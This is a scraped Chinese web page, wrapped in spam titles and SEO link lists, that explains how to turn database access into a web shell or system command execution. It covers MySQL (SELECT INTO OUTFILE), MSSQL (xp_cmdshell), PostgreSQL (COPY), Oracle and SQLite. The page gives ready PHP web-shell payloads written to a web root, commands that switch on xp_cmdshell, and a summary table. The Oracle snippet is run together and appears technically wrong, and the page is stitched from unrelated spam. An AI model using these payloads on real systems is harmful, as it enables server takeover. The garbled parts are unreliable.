当前位置: 首页 > news >正文

深圳做英文网站做水电到哪个网站找信息

深圳做英文网站,做水电到哪个网站找信息,cpu占用超出网站空间的分配值,北京外包公司都有哪些1. MySQL 条件 数据库用户需要具备高权限(如 FILE 权限)。数据库服务运行用户需要对目标目录有写权限。Web 服务器有可写目录,且支持执行上传的脚本(如 PHP、JSP 等)。 原理 利用 MySQL 的 SELECT ... INTO OUTFIL…

1. MySQL

条件
  • 数据库用户需要具备高权限(如 FILE 权限)。
  • 数据库服务运行用户需要对目标目录有写权限。
  • Web 服务器有可写目录,且支持执行上传的脚本(如 PHP、JSP 等)。
原理
  • 利用 MySQL 的 SELECT ... INTO OUTFILE 功能,将恶意代码写入目标 Web 目录,生成一个 Web Shell 文件。
  • 攻击者通过浏览器访问 Web Shell,获得命令执行能力。
流程
  1. 确认 FILE 权限:
    SELECT * FROM mysql.user WHERE User='target_user';
    

  2. 写入 Web Shell 到目标目录:
    SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
    
  3. 通过浏览器访问 Web Shell 执行命令:
    http://xxxxxx.com/shell.php?cmd=whoami

2. Microsoft SQL Server (MSSQL)

条件
  • 数据库用户需要 sysadmin 权限。
  • 目标服务器启用了扩展存储过程 xp_cmdshell
  • 数据库运行用户有命令执行权限。
原理
  • 调用 MSSQL 的 xp_cmdshell 存储过程,直接在操作系统中执行命令。
流程
  1. 确认是否启用了 xp_cmdshell
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    

  2. 利用 xp_cmdshell 执行命令:
    EXEC xp_cmdshell 'whoami';
    
  3. 通过命令的输出或回显获取执行结果。

3. PostgreSQL

条件
  • 数据库用户需要对文件系统具有写权限。
  • 数据库支持使用 COPY 命令将数据写入文件。
  • 目标 Web 目录可写入文件,并允许脚本执行。
原理
  • 利用 PostgreSQL 的 COPY 功能,将 Web Shell 写入目标文件系统。
流程
  1. 写入 Web Shell:
    COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
  2. 访问 Web Shell:

    http://xxxxx.com/shell.php?cmd=id


4. Oracle

条件
  • 数据库用户需要 CREATE LIBRARY 权限。
  • 数据库运行用户需要访问操作系统。
  • 利用外部过程或 Java 存储过程。
原理
  • 通过 Oracle 数据库的外部过程,调用操作系统命令。
  • 使用 Java 存储过程执行系统级操作。
流程
  1. 创建外部库(如 DLL 文件):
    CREATE OR REPLACE LIBRARY mylib AS '/path/to/external/file';
    
  2. 调用外部过程执行命令:
    DECLAREcmd VARCHAR2(1000);
    BEGINcmd := 'ls';DBMS_SCHEDULER.CREATE_JOB(cmd);
    END;
  3. 读取命令执行结果。

5. SQLite

条件
  • SQLite 本身无法直接与操作系统交互。
  • 必须结合其他漏洞(如本地文件包含)实现 Web Shell。
原理
  • 利用 SQLite 的 ATTACH 或其他功能,尝试将恶意数据写入特定目录。
流程
  1. 写入数据:
    ATTACH DATABASE '/var/www/html/shell.php' AS shell;
  2. 在 Web 服务器中访问生成的 Web Shell 文件。

总结表

数据库条件原理流程简述
MySQLFILE 权限,Web 目录可写写入 Web Shell 通过 SELECT ... INTO OUTFILE写 Shell -> 访问 Shell -> 执行命令
MSSQLsysadmin 权限,启用 xp_cmdshell使用 xp_cmdshell 直接执行系统命令开启 xp_cmdshell -> 执行命令
PostgreSQL写权限,Web 目录可访问使用 COPY 写入 Web Shell写 Shell -> 访问 Shell -> 执行命令
OracleCREATE LIBRARY 权限,系统访问权限使用外部库或 Java 存储过程调用系统命令配置库 -> 调用命令
SQLite结合其他漏洞(如文件包含)写入恶意数据文件,结合其他漏洞(如 LFI)访问写 Shell -> 结合 LFI 执行
http://www.yayakq.cn/news/71844/

相关文章:

  • 营销创意网站媒体软文发稿
  • 淮北市网站建设建设银行信用卡中心网站首页
  • c 语言网站建设android开发培训
  • 做网站是什么世界工厂采购网app
  • 成都微网站廊坊兼职网站建设
  • 法学院网站建设建议手机端网站外部链接如何去优化
  • 网站首页收录突然没有了贵阳市城乡建设厅网站
  • 高端的响应式网站建设公司太原seo快速排名怎么样
  • 电脑怎样做轰炸网站绵阳高端网站建设
  • 江阴市建设局网站管理通道自适应型网站建设哪家好
  • linux做网站好微分销商城网站建设
  • 域名暂无法进行网站备案wordpress文章登录可见
  • 网站的服务器是什么客户问 你们网站怎么做的
  • 阜阳北京网站建设西安本地十家做网站建设的公司
  • 做哪种网站赚钱wordpress 显示子菜单
  • 云之创网站建设最佳的资源磁力搜索引擎
  • 平面设计最常用的网站asp网站代码
  • 秦皇岛做网站的公司山东专业网站建设公司
  • 金融网站模板源代码crm系统的销售管理功能包括
  • 微网站成功案例用wordpress搭建网站
  • 网站制作的必备技巧有哪些wordpress玻璃质感主题
  • 设计网站的意义如何找外包网站来做
  • 做智能网站系统下载软件wordpress 加内链
  • 门户网站建设意义全国网站建设公司
  • 关于做教育新闻的网站wordpress自定义用户字段
  • 厦门市建设工程质量安全协会网站山西住房和建设厅网站
  • 成都网站设计推荐柚米网站闭站保护
  • 免费标志在线设计生成seo优化一般包括哪些内容
  • 广州高端网站制作公司西安网页设计公司推荐
  • 道滘做网站代理ip提取网站源码